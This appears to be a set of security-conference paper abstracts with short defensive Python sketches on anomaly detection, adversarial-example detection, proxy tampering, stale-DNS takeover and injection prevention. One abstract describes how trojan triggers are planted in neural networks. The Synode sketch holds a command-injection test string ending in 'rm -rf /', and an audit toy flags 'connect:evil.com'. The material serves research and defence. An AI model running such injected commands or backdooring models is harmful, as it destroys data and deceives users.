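# Reconstruction-error anomaly detection with a linear autoencoder (PCA).
import numpy as np

rng = np.random.default_rng(0)

# "Normal" traffic features live near a low-dimensional subspace.
normal = rng.normal(size=(5000, 2)) @ rng.normal(size=(2, 10))
normal += 0.01 * rng.normal(size=normal.shape)

mu = normal.mean(axis=0)
# Principal components act as encoder/decoder weights.
_, _, vt = np.linalg.svd(normal - mu, full_matrices=False)
basis = vt[:2]                        # keep 2 latent dimensions

def rmse(x):
    latent = (x - mu) @ basis.T       # encode
    recon = latent @ basis + mu       # decode
    return float(np.sqrt(np.mean((x - recon) ** 2)))

threshold = max(rmse(row) for row in normal)  # calibrate on normal data only

attack = rng.normal(size=10)          # off-subspace point: an "attack" record
print(f"normal RMSE ~ {rmse(normal[0]):.4f}, attack RMSE ~ {rmse(attack):.4f}")
print("alert!" if rmse(attack) > threshold else "ok")
```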

Feature Squeezing: Detecting Adversarial Examples in Deep Neural Networks

Although deep neural networks (DNNs) have achieved great success in many tasks, they can often be fooled by adversarial examples that are generated by adding small but purposeful distortions to natural examples. Previous studies to defend against adversarial examples mostly focused on refining the DNN models, but have either shown limited success or required expensive computation. We propose a new strategy, feature squeezing, that can be used to harden DNN models by detecting adversarial examples. Feature squeezing reduces the search space available to an adversary by coalescing samples that correspond to many different feature vectors in the original space into a single sample. By comparing a DNN model’s prediction on the original input with that on squeezed inputs, feature squeezing detects adversarial examples with high accuracy and few false positives. This paper explores two feature squeezing methods: reducing the color bit depth of each pixel and spatial smoothing. These simple strategies are inexpensive and complementary to other defenses, and can be combined in a joint detection framework to achieve high detection rates against state-of-the-art attacks.
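Both squeezers are a few lines each, and the detector just compares prediction vectors before and after squeezing. A sketch with a toy model standing in for a DNN (any function returning a probability vector works); on a real classifier, adversarial inputs typically exceed the threshold while benign ones do not:

```python
# Feature squeezing detection: flag inputs whose prediction moves too much
# under bit-depth reduction or spatial smoothing.
import numpy as np
from scipy.ndimage import median_filter

def reduce_bit_depth(img, bits):
    """Squeeze 1: keep `bits` bits per pixel (img values in [0, 1])."""
    levels = 2 ** bits - 1
    return np.round(img * levels) / levels

def smooth(img, size=3):
    """Squeeze 2: local spatial smoothing with a median filter."""
    return median_filter(img, size=size)

def is_adversarial(model, img, threshold):
    p = model(img)
    gaps = [np.abs(p - model(reduce_bit_depth(img, 4))).sum(),
            np.abs(p - model(smooth(img))).sum()]
    # Joint detection: alert if any squeezer moves the prediction too far.
    return max(gaps) > threshold

def toy_model(img):
    # Stand-in for a DNN: a smooth function of mean intensity.
    m = float(img.mean())
    return np.array([m, 1.0 - m])

rng = np.random.default_rng(0)
benign = np.clip(rng.normal(0.7, 0.05, (28, 28)), 0, 1)
print(is_adversarial(toy_model, benign, threshold=0.2))  # False: stable
```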

Trojaning Attack on Neural Networks

With the fast spread of machine learning techniques, sharing and adopting public machine learning models has become very popular. This gives attackers many new opportunities. In this paper, we propose a trojaning attack on neural networks. As the models are not intuitive for humans to understand, the attack features stealthiness. Deploying trojaned models can cause various severe consequences including endangering human lives (in applications like autonomous driving). We first invert the neural network to generate a general trojan trigger, and then retrain the model with reverse-engineered training data to inject malicious behaviors into the model. The malicious behaviors are only activated by inputs stamped with the trojan trigger. In our attack, we do not need to tamper with the original training process, which usually takes weeks to months. Instead, it takes minutes to hours to apply our attack. Also, we do not require the datasets that are used to train the model. In practice, the datasets are usually not shared due to privacy or copyright concerns. We use five different applications to demonstrate the power of our attack, and perform a deep analysis on the possible factors that affect the attack. The results show that our attack is highly effective and efficient. The trojaned behaviors can be successfully triggered (with nearly 100% probability) without affecting the model’s test accuracy on normal inputs, and even with better accuracy on public datasets. Also, it only takes a small amount of time to attack a complex neural network model. In the end, we also discuss possible defenses against such attacks.

Session 3B: Authentication

Broken Fingers: On the Usage of the Fingerprint API in Android

Smartphones are increasingly used for very important tasks such as mobile payments. Correspondingly, new technologies are emerging to provide better security on smartphones. One of the most recent and most interesting is the ability to recognize fingerprints, which enables mobile apps to use biometric-based authentication and authorization to protect security-sensitive operations. In this paper, we present the first systematic analysis of the fingerprint API in Android, and we show that this API is not well understood and often misused by app developers. To make things worse, there is currently confusion about which threat model the fingerprint API should be resilient against. For example, although there is no official reference, we argue that the fingerprint API is designed to protect from attackers that can completely compromise the untrusted OS. After introducing several relevant threat models, we identify common API usage patterns and show how inappropriate choices can make apps vulnerable to multiple attacks. We then design and implement a new static analysis tool to automatically analyze the usage of the fingerprint API in Android apps. Using this tool, we perform the first systematic study on how the fingerprint API is used. The results are worrisome: Our tool indicates that 53.69% of the analyzed apps do not use any cryptographic check to ensure that the user actually touched the fingerprint sensor. Depending on the specific use case scenario of a given app, it is not always possible to make use of cryptographic checks. However, a manual investigation on a subset of these apps revealed that 80% of them could have done so, preventing multiple attacks. Furthermore, the tool indicates that only 1.80% of the analyzed apps use this API in the most secure way possible, while many others, including extremely popular apps such as Google Play Store and Square Cash, use it in weaker ways. To make things worse, we find issues and inconsistencies even in the samples provided by the official Google documentation. We end this work by suggesting various improvements to the fingerprint API to prevent some of these problematic attacks.

K-means++ vs. Behavioral Biometrics: One Loop to Rule Them All

Behavioral biometrics, a field that studies patterns in an individual’s unique behavior, has been researched actively as a means of authentication for decades. Recently, it has even been adopted in many real world scenarios. In this paper, we study keystroke dynamics, the most researched of such behavioral biometrics, from the perspective of an adversary. We designed two adversarial agents with a standard accuracy-convenience tradeoff: Targeted K-means++, which is an expensive, but extremely effective adversarial agent, and Indiscriminate K-means++, which is slightly less powerful, but adds no overhead cost to the attacker. With Targeted K-means++ we could compromise the security of 40-70% of users within ten tries. In contrast, with Indiscriminate K-means++, the security of 30-50% of users was compromised. Therefore, we conclude that while keystroke dynamics has potential, it is not ready for security critical applications yet. Future keystroke dynamics research should use such adversaries to benchmark the performance of the detection algorithms, and design better algorithms to foil these. Finally, we show that the K-means++ adversarial agent generalizes well to even other types of behavioral biometrics data by applying it on a dataset of touchscreen swipes.

ABC: Enabling Smartphone Authentication with Built-in Camera

Reliably identifying and authenticating smartphones is critical in our daily life since they are increasingly being used to manage sensitive data such as private messages and financial data. Recent research on hardware fingerprinting shows that each smartphone, regardless of the manufacturer or make, possesses a variety of hardware fingerprints that are unique, robust, and physically unclonable. There is a growing interest in designing and implementing hardware-rooted smartphone authentication which authenticates smartphones through verifying the hardware fingerprints of their built-in sensors. Unfortunately, previous fingerprinting methods either involve large registration overhead or suffer from fingerprint forgery attacks, rendering them infeasible in authentication systems. In this paper, we propose ABC, a real-time smartphone Authentication protocol utilizing the photo-response non-uniformity (PRNU) of the Built-in Camera. In contrast to previous works that require tens of images to build reliable PRNU features for conventional cameras, we are the first to observe that one image alone can uniquely identify a smartphone due to the unique PRNU of a smartphone image sensor. This new discovery makes the use of PRNU practical for smartphone authentication. While most existing hardware fingerprints are vulnerable against forgery attacks, ABC defeats forgery attacks by verifying a smartphone’s PRNU identity through a challenge response protocol using a visible light communication channel. A user captures two time-variant QR codes and sends the two images to a server, which verifies the identity by fingerprint and image content matching. The time-variant QR codes can also defeat replay attacks. Our experiments with 16,000 images over 40 smartphones show that ABC can efficiently authenticate user devices with an error rate less than 0.5%.

Device Pairing at the Touch of an Electrode

Device pairing is the problem of having two devices securely establish a key that can be used to secure subsequent communication. The problem arises every time two devices that do not already share a secret need to bootstrap a secure communication channel. Many solutions exist, all suited to different situations, and all with their own strengths and weaknesses. In this paper, we propose a novel approach to device pairing that applies whenever a user wants to pair two devices that can be physically touched at the same time. The pairing process is easy to perform, even for novice users. A central problem for a device (Alice) running a device pairing protocol is determining whether the other party (Bob) is in fact the device with which we are supposed to establish a key. Our scheme is based on the idea that two devices can perform device pairing if they are physically held by the same person (at the same time). In order to pair two devices, a person touches a conductive surface on each device. While the person is in contact with both devices, the human body acts as a transmission medium for intra-body communication and the two devices can communicate through the body. This body channel is used as part of a pairing protocol which allows the devices to agree on a mutual secret and, at the same time, extract physical features to verify that they are being held by the same person. We prove that our device pairing protocol is secure in our threat model, and we build a proof-of-concept setup and conduct experiments with 15 people to verify the idea in practice.

Face Flashing: a Secure Liveness Detection Protocol based on Light Reflections

Face authentication systems are becoming increasingly prevalent, especially with the rapid development of Deep Learning technologies. However, human facial information is easy to capture and reproduce, which makes face authentication systems vulnerable to various attacks. Liveness detection is an important defense technique to prevent such attacks, but existing solutions do not provide clear and strong security guarantees, especially in terms of time. To overcome these limitations, we propose a new liveness detection protocol called Face Flashing that significantly raises the bar for launching successful attacks on face authentication systems. By randomly flashing well-designed pictures on a screen and analyzing the reflected light, our protocol leverages physical characteristics of human faces: reflection processing at the speed of light, unique textural features, and uneven 3D shapes. Cooperating with the working mechanisms of the screen and digital cameras, our protocol is able to detect subtle traces left by an attacking process. To demonstrate the effectiveness of Face Flashing, we implemented a prototype and performed thorough evaluations with a large dataset collected from real-world scenarios. The results show that our Timing Verification can effectively detect the time gap between legitimate authentications and malicious cases. Our Face Verification can also accurately differentiate 2D planes from 3D objects. The overall accuracy of our liveness detection system is 98.8%, and its robustness was evaluated in different scenarios. In the worst case, our system’s accuracy decreased to a still-high 97.3%.

Session 4A: Measurements

A Large-scale Analysis of Content Modification by Open HTTP Proxies

Open HTTP proxies offer a quick and convenient solution for routing web traffic towards a destination. In contrast to more elaborate relaying systems, such as anonymity networks or VPN services, users can freely connect to an open HTTP proxy without the need to install any special software. Therefore, open HTTP proxies are an attractive option for bypassing IP-based filters and geo-location restrictions, circumventing content blocking and censorship, and in general, hiding the client’s IP address when accessing a web server. Nevertheless, the consequences of routing traffic through an untrusted third party can be severe, while the operating incentives of the thousands of publicly available HTTP proxies are questionable. In this paper, we present the results of a large-scale analysis of open HTTP proxies, focusing on determining the extent to which user traffic is manipulated while being relayed. We have designed a methodology for detecting proxies that, instead of passively relaying traffic, actively modify the relayed content. Beyond simple detection, our framework is capable of macroscopically attributing certain traffic modifications at the network level to well-defined malicious actions, such as ad injection, user fingerprinting, and redirection to malware landing pages. We have applied our methodology on a large set of publicly available HTTP proxies, which we monitored for a period of two months, and identified that 38% of them perform some form of content modification. The majority of these proxies can be considered benign, as they do not perform any harmful content modification. However, 5.15% of the tested proxies were found to perform modification or injection that can be considered malicious or unwanted. Specifically, 47% of the malicious proxies injected ads, 39% injected code for collecting user information that can be used for tracking and fingerprinting, and 12% attempted to redirect the user to pages that contain malware. Our study reveals the true incentives of many of the publicly available web proxies. Our findings raise several concerns, as we uncover multiple cases where users can be severely affected by connecting to an open proxy. As a step towards protecting users against unwanted content modification, we built a service that leverages our methodology to automatically collect and probe public proxies, and generates, on a daily basis, a list of safe proxies that do not perform any content modification.
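
The core of the measurement is conceptually simple: serve a page whose exact contents you control, fetch it both directly and through each proxy, and attribute any difference. A rough sketch of one probe (the proxy address and honeysite URL are placeholders, not the authors' infrastructure):

```python
# Fetch a controlled page directly and via an open proxy, then diff the bodies;
# injected <script> tags are a strong signal of ad or malware injection.
import difflib
import requests

HONEYSITE = "http://example.com/"            # in practice: a decoy page you control
PROXY = {"http": "http://203.0.113.7:8080"}  # placeholder open HTTP proxy

direct = requests.get(HONEYSITE, timeout=10).text
via_proxy = requests.get(HONEYSITE, proxies=PROXY, timeout=10).text

for line in difflib.unified_diff(direct.splitlines(), via_proxy.splitlines(), lineterm=""):
    if line.startswith(("+", "-")) and "script" in line.lower():
        print(line)
```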

Measuring and Disrupting Anti-Adblockers Using Differential Execution Analysis

Millions of people use adblockers to remove intrusive and malicious ads as well as protect themselves against tracking and pervasive surveillance. Online publishers consider adblockers a major threat to the ad-powered “free” Web. They have started to retaliate against adblockers by employing anti-adblockers, which can detect and stop adblock users. To counter this retaliation, adblockers in turn try to detect and filter anti-adblocking scripts. This back and forth has prompted an escalating arms race between adblockers and anti-adblockers. We want to develop a comprehensive understanding of anti-adblockers, with the ultimate aim of enabling adblockers to bypass state-of-the-art anti-adblockers. In this paper, we present a differential execution analysis to automatically detect and analyze anti-adblockers. At a high level, we collect execution traces by visiting a website with and without adblockers. Through differential execution analysis, we are able to pinpoint the conditions that lead to the differences caused by anti-adblocking code. Using our system, we detect anti-adblockers on 30.5% of the Alexa top-10K websites, which is 5-52 times more than reported in prior literature. Unlike prior work, which is limited to detecting visible reactions (e.g., warning messages) by anti-adblockers, our system can discover attempts to detect adblockers even when there is no visible reaction. From manually checking one third of the detected websites, we find that the websites that have no visible reactions constitute over 90% of the cases, completely dominating the ones that have visible warning messages. Finally, based on our findings, we further develop JavaScript rewriting and API hooking based solutions (the latter implemented as a Chrome extension) to help adblockers bypass state-of-the-art anti-adblockers.
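
The differential execution idea can be pictured without a real browser: record an execution trace of the page's scripts with and without the adblocker and locate the first point where they diverge; the branch at that point is a candidate anti-adblocking check. A toy illustration over hypothetical (script, line) traces:

```python
# Find the first divergence between two execution traces; in the real system
# the traces are branch-level logs from instrumented JavaScript engine runs.
import itertools

trace_with_adblock = [("ads.js", 1), ("detect.js", 10), ("detect.js", 42)]
trace_without      = [("ads.js", 1), ("detect.js", 10), ("detect.js", 17)]

for a, b in itertools.zip_longest(trace_with_adblock, trace_without):
    if a != b:
        print("divergence at:", a, "vs", b)   # candidate anti-adblock branch
        break
```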

Towards Measuring the Effectiveness of Telephony Blacklists

The convergence of telephony with the Internet has led to numerous new attacks that make use of phone calls to defraud victims. In response to the increasing number of unwanted or fraudulent phone calls, a number of call blocking applications have appeared on smartphone app stores, including a recent update to the default Android phone app that alerts users of suspected spam calls. However, little is known about the methods used by these apps to identify malicious numbers, and how effective these methods are in practice. In this paper, we are the first to systematically investigate multiple data sources that may be leveraged to automatically learn phone blacklists, and to explore the potential effectiveness of such blacklists by measuring their ability to block future unwanted phone calls. Specifically, we consider four different data sources: user-reported call complaints submitted to the Federal Trade Commission (FTC), complaints collected via crowd-sourced efforts (e.g., 800notes.com), call detail records (CDR) from a large telephony honeypot [1], and honeypot-based phone call audio recordings. Overall, our results show that phone blacklists are capable of blocking a significant fraction of future unwanted calls (e.g., more than 55%). Also, they have a very low false positive rate of only 0.01% for phone numbers of legitimate businesses. We also propose an unsupervised learning method to identify prevalent spam campaigns from different data sources, and show how effective blacklists may be as a defense against such campaigns.
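
At its simplest, the evaluation amounts to building a list from past complaint data and replaying later calls against it. A toy sketch with synthetic numbers (the threshold K and the data are illustrative, not the paper's parameters):

```python
# Blacklist numbers with >= K complaints in a training window, then measure
# how many future unwanted calls the list would have blocked.
from collections import Counter

train_complaints = ["+1555000001"] * 12 + ["+1555000002"] * 3 + ["+1555000003"]
future_unwanted  = ["+1555000001"] * 20 + ["+1555000002"] * 5 + ["+1555000009"] * 5
K = 5

blacklist = {num for num, c in Counter(train_complaints).items() if c >= K}
blocked = sum(1 for call in future_unwanted if call in blacklist)
print(f"blocked {blocked}/{len(future_unwanted)} future unwanted calls")
```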

Things You May Not Know About Android (Un)Packers: A Systematic Study based on Whole-System Emulation

The prevalent usage of runtime packers has complicated Android malware analysis, as both legitimate and malicious apps are leveraging packing mechanisms to protect themselves against reverse engineering. Although recent efforts have been made to analyze particular packing techniques, little has been done to study the unique characteristics of Android packers. In this paper, we report the first systematic study on mainstream Android packers, in an attempt to understand their security implications. For this purpose, we developed DROIDUNPACK, a whole-system emulation based Android packing analysis framework, which, compared with existing tools, relies on intrinsic characteristics of the Android runtime (rather than heuristics), and further enables virtual machine inspection to precisely recover hidden code and reveal packing behaviors. Running our tool on 6 major commercial packers, 93,910 Android malware samples and 3 existing state-of-the-art unpackers, we found that not only are commercial packing services abused to encrypt malicious or plagiarized contents, they themselves also introduce security-critical vulnerabilities to the apps being packed. Our study further reveals the prevalence and rapid evolution of custom packers used by malware authors, which cannot be defended against using existing techniques, due to their design weaknesses.

Session 6A: Cloud

Reduced Cooling Redundancy: A New Security Vulnerability in a Hot Data Center

Data centers have been growing rapidly in recent years to meet the surging demand for cloud services. However, the expanding scale and powerful servers generate a great amount of heat, resulting in significant cooling costs. A trend in modern data centers is to raise the temperature and maintain all servers in a relatively hot environment. While this can save on cooling costs given benign workloads running in servers, the hot environment increases the risk of cooling failure. In this paper, we unveil a new vulnerability of existing data centers with aggressive cooling energy saving policies. Such a vulnerability might be exploited to launch thermal attacks that could severely worsen the thermal conditions in a data center. Specifically, we conduct thermal measurements and uncover effective thermal attack vectors at the server, rack, and data center levels. We also present damage assessments of thermal attacks. Our results demonstrate that thermal attacks can (1) largely increase the temperature of victim servers, degrading their performance and reliability, (2) negatively impact the thermal conditions of neighboring servers, causing local hotspots, (3) raise the cooling cost, and (4) even lead to cooling failures. Finally, we propose effective defenses to prevent thermal attacks from becoming a serious security threat to data centers.

OBLIVIATE: A Data Oblivious Filesystem for Intel SGX

Intel SGX provides confidentiality and integrity of a program running within the confines of an enclave, and is expected to enable valuable security applications such as private information retrieval. This paper is concerned with the security aspects of SGX in accessing a key system resource, files. Through concrete attack scenarios, we show that all existing SGX filesystems are vulnerable to either system call snooping, page fault, or cache based side-channel attacks. To address these security limitations in current SGX filesystems, we present OBLIVIATE, a data-oblivious filesystem for Intel SGX. The key idea behind OBLIVIATE is in adapting the ORAM protocol to read and write data from a file within an SGX enclave. OBLIVIATE redesigns the conceptual components of ORAM for SGX environments, and it seamlessly supports an SGX program without requiring any changes in the application layer. OBLIVIATE also employs SGX-specific defenses and optimizations in order to ensure complete security with acceptable overhead. The evaluation of the prototype of OBLIVIATE demonstrated its practical effectiveness in running popular server applications such as SQLite and Lighttpd, while also achieving a throughput improvement of 2×-8× over a baseline ORAM-based solution, and less than 2× overhead over an in-memory SGX filesystem.

Microarchitectural Minefields: 4K-Aliasing Covert Channel and Multi-Tenant Detection in IaaS Clouds

We introduce a new microarchitectural timing covert channel using the processor memory order buffer (MOB). Specifically, we show how an adversary can infer the state of a spy process on the Intel 64 and IA-32 architectures when predicting dependent loads through the store buffer, called 4K-aliasing. The 4K-aliasing event is a side effect of memory disambiguation misprediction while handling write-after-read data hazards, wherein the lower 12 bits of a load address will falsely match store addresses resident in the MOB. In this work, we extensively analyze 4K-aliasing and demonstrate a new timing channel measurable across processes when executed as hyperthreads. We then use 4K-aliasing to build a robust covert communication channel on both Amazon EC2 and Google Compute Engine capable of communicating at speeds of 1.28 Mbps and 1.49 Mbps, respectively. In addition, we show that 4K-aliasing can also be used to reliably detect multi-tenancy.

Cloud Strife: Mitigating the Security Risks of Domain-Validated Certificates

Infrastructure-as-a-Service (IaaS), and more generally the “cloud,” like Amazon Web Services (AWS) or Microsoft Azure, have changed the landscape of system operations on the Internet. Their elasticity allows operators to rapidly allocate and use resources as needed, from virtual machines, to storage, to bandwidth, and even to IP addresses, which is what made them popular and spurred innovation. In this paper, we show that this dynamic component, paired with recent developments in trust-based ecosystems (e.g., SSL certificates), creates so-far-unknown attack vectors. Specifically, we discover a substantial number of stale DNS records that point to available IP addresses in clouds, yet still receive active access attempts. Often, these records belong to discontinued services that were previously hosted in the cloud. We demonstrate that it is practical, time-efficient, and cost-efficient for attackers to allocate the IP addresses to which stale DNS records point. Considering the ubiquity of domain validation in trust ecosystems, like SSL certificates, an attacker can impersonate the service using a valid certificate trusted by all major operating systems and browsers. The attacker can then also exploit residual trust in the domain name for phishing, receiving and sending emails, or possibly distributing code to clients that load remote code from the domain (e.g., the loading of native code by mobile apps, or JavaScript libraries by websites). Even worse, an aggressive attacker could execute the attack in less than 70 seconds, well below the common time-to-live (TTL) of DNS records. In turn, this means an attacker could exploit normal service migrations in the cloud to obtain a valid SSL certificate for domains owned and managed by others, and, worse, that she might not actually be bound by DNS records being (temporarily) stale, but can exploit caching instead. We introduce a new authentication method for trust-based domain validation that mitigates staleness issues without incurring additional effort for the certificate requester, by incorporating existing trust of a name into the validation process. Furthermore, we provide recommendations for domain name owners and cloud operators to reduce their and their clients’ exposure to DNS staleness issues and the resulting domain takeover attacks.
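
Prototyping the stale-record scan is straightforward: resolve each domain, check whether the A record points into cloud address space, and probe whether anything still answers there; unanswered cloud IPs are candidates an attacker could try to allocate. A rough sketch (the CIDR block and domain are placeholders):

```python
# Flag DNS records that point into cloud IP space where nothing is listening.
import socket
from ipaddress import ip_address, ip_network

CLOUD_BLOCKS = [ip_network("52.0.0.0/11")]   # placeholder, e.g. part of AWS space

def maybe_stale(domain):
    try:
        ip = socket.gethostbyname(domain)
    except socket.gaierror:
        return False                          # no A record at all
    if not any(ip_address(ip) in net for net in CLOUD_BLOCKS):
        return False                          # not cloud-hosted
    try:
        socket.create_connection((ip, 80), timeout=3).close()
        return False                          # something answers: likely in use
    except OSError:
        return True                           # cloud IP, nobody home: candidate

print(maybe_stale("old-service.example.com"))
```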

Session 7A: Web Security

Game of Missuggestions: Semantic Analysis of Search-Autocomplete Manipulations

As a new type of blackhat Search Engine Optimization (SEO), autocomplete manipulations are increasingly utilized by miscreants and promotion companies alike to advertise desired suggestion terms when related trigger terms are entered by the user into a search engine. Like other illicit SEO, such activities game the search engine, mislead the querier, and in some cases, spread harmful content. However, little has been done to understand this new threat, in terms of its scope, impact and techniques, not to mention any serious effort to detect such manipulated terms on a large scale. Systematic analysis of autocomplete manipulation is challenging, due to the scale of the problem (tens or even hundreds of millions of suggestion terms and their search results) and the heavy burden it puts on the search engines. In this paper, we report the first technique that addresses these challenges, making a step toward better understanding and ultimately eliminating this new threat. Our technique, called Sacabuche, takes a semantics-based, two-step approach to minimize its performance impact: it utilizes Natural Language Processing (NLP) to analyze a large number of trigger and suggestion combinations, without querying search engines, to filter out the vast majority of legitimate suggestion terms; only a small set of suspicious suggestions are run against the search engines to get query results for identifying truly abused terms. This approach achieves a 96.23% precision and 95.63% recall, and its scalability enables us to perform a measurement study on 114 million suggestion terms, an unprecedented scale for this type of study. The findings of the study bring to light the magnitude of the threat (0.48% of the Google suggestion terms we collected were manipulated), and its significant security implications never reported before (e.g., the exceedingly long lifetime of campaigns, and sophisticated techniques and channels for spreading malware and phishing content).

SYNODE: Understanding and Automatically Preventing Injection Attacks on NODE.JS

The Node.js ecosystem has led to the creation of many modern applications, such as server-side web applications and desktop applications. Unlike client-side JavaScript code, Node.js applications can interact freely with the operating system without the benefits of a security sandbox. As a result, command injection attacks can cause significant harm, which is compounded by the fact that independently developed Node.js modules interact in uncontrolled ways. This paper presents a large-scale study across 235,850 Node.js modules to explore injection vulnerabilities. We show that injection vulnerabilities are prevalent in practice, both due to eval, which was previously studied for browser code, and due to the powerful exec API introduced in Node.js. Our study suggests that thousands of modules may be vulnerable to command injection attacks and that fixing them takes a long time, even for popular projects. Motivated by these findings, we present Synode, an automatic mitigation technique that combines static analysis and runtime enforcement of security policies to use vulnerable modules in a safe way. The key idea is to statically compute a template of values passed to APIs that are prone to injections, and to synthesize a grammar-based runtime policy from these templates. Our mechanism is easy to deploy: it does not require any modification of the Node.js platform, it is fast (sub-millisecond runtime overhead), and it protects against attacks on vulnerable modules, while inducing very few false positives (less than 10%).
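
Synode's runtime half can be pictured as a template check in front of the exec sink: the constant parts of the command are fixed by static analysis, and only values matching a benign grammar may fill the holes. A simplified Python rendering of the idea (the real system synthesizes policies from Node.js call sites; the template and grammar below are invented):

```python
# Grammar-based runtime policy guarding a shell-command sink.
import re

# Template mined (statically) from a hypothetical call site:
#   exec("convert " + input + " -resize 50% " + output)
TEMPLATE = re.compile(r"convert (?P<inp>\S+) -resize 50% (?P<out>\S+)")
SAFE_VALUE = re.compile(r"[\w./-]+")          # hole values: no shell metacharacters

def guarded_exec(cmd):
    m = TEMPLATE.fullmatch(cmd)
    if not m or not all(SAFE_VALUE.fullmatch(v) for v in m.groupdict().values()):
        raise PermissionError(f"rejected by injection policy: {cmd!r}")
    print("would exec:", cmd)                 # subprocess.run(...) in a real sink

guarded_exec("convert cat.png -resize 50% cat_small.png")        # conforms
try:
    guarded_exec("convert cat.png -resize 50% x; rm -rf /")      # injection
except PermissionError as e:
    print(e)
```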

JavaScript Zero: Real JavaScript and Zero Side-Channel Attacks

Modern web browsers are ubiquitously used by billions of users, connecting them to the world wide web. From the other side, web browsers not only provide a unified interface for businesses to reach customers, but also a unified interface for malicious actors to reach users. The highly optimized scripting language JavaScript plays an important role in the modern web, as well as in browser-based attacks. These attacks include microarchitectural attacks, which exploit the design of the underlying hardware. In contrast to software bugs, there is often no easy fix for microarchitectural attacks. We propose JavaScript Zero, a highly practical and generic fine-grained permission model in JavaScript to reduce the attack surface in modern browsers. JavaScript Zero leverages advanced features of the JavaScript language to dynamically deflect the usage of dangerous JavaScript features. To implement JavaScript Zero in practice, we overcame a series of challenges to protect potentially dangerous features, guarantee the completeness of our solution, and provide full compatibility with all websites. We demonstrate that our proof-of-concept browser extension Chrome Zero protects against 11 unfixed state-of-the-art microarchitectural and side-channel attacks. As a side effect, Chrome Zero also protects against 50% of the published JavaScript 0-day exploits since Chrome 49. Chrome Zero has a performance overhead of 1.82% on average. In a user study, we found that for 24 websites in the Alexa Top 25, users could not correctly distinguish browsers with and without Chrome Zero, showing that Chrome Zero has no perceivable effect on most websites. Hence, JavaScript Zero is a practical solution to mitigate JavaScript-based state-of-the-art microarchitectural and side-channel attacks.

Riding out DOMsday: Towards Detecting and Preventing DOM Cross-Site Scripting

Cross-site scripting (XSS) vulnerabilities are the most frequently reported web application vulnerability. As complex JavaScript applications become more widespread, DOM (Document Object Model) XSS vulnerabilities—a type of XSS vulnerability where the vulnerability is located in client-side JavaScript, rather than server-side code—are becoming more common. As the first contribution of this work, we empirically assess the impact of DOM XSS on the web using a browser with taint tracking embedded in the JavaScript engine. Building on the methodology used in a previous study that crawled popular websites, we collect a current dataset of potential DOM XSS vulnerabilities. We improve on the methodology for confirming XSS vulnerabilities, and using this improved methodology, we find 83% more vulnerabilities than the previous methodology applied to the same dataset. As a second contribution, we identify the causes of, and discuss how to prevent, DOM XSS vulnerabilities. One example of our findings is that custom HTML templating designs—a design pattern that could prevent DOM XSS vulnerabilities, analogous to parameterized SQL—can be buggy in practice, allowing DOM XSS attacks. As our third contribution, we evaluate the error rates of three static-analysis tools against DOM XSS vulnerabilities found with dynamic analysis techniques using in-the-wild examples. We find the static-analysis tools to miss 90% of the bugs found by our dynamic analysis, though some tools have very few false positives and at the same time find vulnerabilities not found by the dynamic analysis.

Session 7B: Audit Logs

Towards Scalable Cluster Auditing through Grammatical Inference over Provenance Graphs

Investigating the nature of system intrusions in large distributed systems remains a notoriously difficult challenge. While monitoring tools (e.g., firewalls, IDS) provide preliminary alerts through easy-to-use administrative interfaces, attack reconstruction still requires that administrators sift through gigabytes of system audit logs stored locally on hundreds of machines. At present, two fundamental obstacles prevent synergy between system-layer auditing and modern cluster monitoring tools: 1) the sheer volume of audit data generated in a data center is prohibitively costly to transmit to a central node, and 2) system-layer auditing poses a “needle-in-a-haystack” problem, such that hundreds of employee hours may be required to diagnose a single intrusion. This paper presents Winnower, a scalable system for audit-based cluster monitoring that addresses these challenges. Our key insight is that, for tasks that are replicated across nodes in a distributed application, a model can be defined over audit logs to succinctly summarize the behavior of many nodes, thus eliminating the need to transmit redundant audit records to a central monitoring node. Specifically, Winnower parses audit records into provenance graphs that describe the actions of individual nodes, then performs grammatical inference over individual graphs using a novel adaptation of Deterministic Finite Automata (DFA) learning to produce a behavioral model of many nodes at once. This provenance model can be efficiently transmitted to a central node and used to identify anomalous events in the cluster. We have implemented Winnower for Docker Swarm container clusters and evaluate our system against real-world applications and attacks. We show that Winnower dramatically reduces storage and network overhead associated with aggregating system audit logs, by as much as 98%, without sacrificing the important information needed for attack investigation. Winnower thus represents a significant step forward for security monitoring in distributed systems.
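
Stripped of the DFA-merging machinery, the modeling step says: one small automaton summarizes many nodes' audit logs, so only non-conforming behavior needs to travel to the central monitor. A toy prefix-tree-acceptor version (Winnower additionally generalizes the tree by merging states, which is omitted here; the events are invented):

```python
# Build a prefix-tree acceptor over per-node event sequences and use it to
# flag sequences the model does not accept.
def build_pta(sequences):
    root = {}
    for seq in sequences:
        node = root
        for event in seq:
            node = node.setdefault(event, {})
    return root

def accepts(pta, seq):
    node = pta
    for event in seq:
        if event not in node:
            return False
        node = node[event]
    return True

normal = [["fork", "exec:nginx", "open:/etc/nginx.conf"],
          ["fork", "exec:nginx", "accept"]]
pta = build_pta(normal)
print(accepts(pta, ["fork", "exec:nginx", "accept"]))         # True: routine
print(accepts(pta, ["fork", "exec:sh", "connect:evil.com"]))  # False: report it
```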

MCI : Modeling-based Causality Inference in Audit Logging for Attack Investigation

In this paper, we develop a model-based causality inference technique for audit logging that does not require any application instrumentation or kernel modification. It leverages a recent dynamic analysis, dual execution (LDX), that can infer precise causality between system calls but unfortunately requires doubling the resource consumption, such as CPU time and memory. For each application, we use LDX to acquire precise causal models for a set of primitive operations. Each model is a sequence of system calls that have inter-dependences, some of them caused by memory operations and hence implicit at the system call level. These models are described by a language that supports various complexity classes, such as regular, context-free, and even context-sensitive. In production runs, a novel parser is deployed to parse audit logs (without any enhancement) into model instances and hence derive causality. Our evaluation on a set of real-world programs shows that the technique is highly effective. The generated models can recover causality with 0% false positives (FP) and false negatives (FN) for most programs, and only 8.3% FP and 5.2% FN in the worst cases. The models also feature excellent composability, meaning that models derived from primitive operations can be composed to describe causality for large and complex real-world missions. Applying our technique to attack investigation shows that the system-wide attack causal graphs are highly precise and concise, having better quality than the state-of-the-art.

Towards a Timely Causality Analysis for Enterprise Security

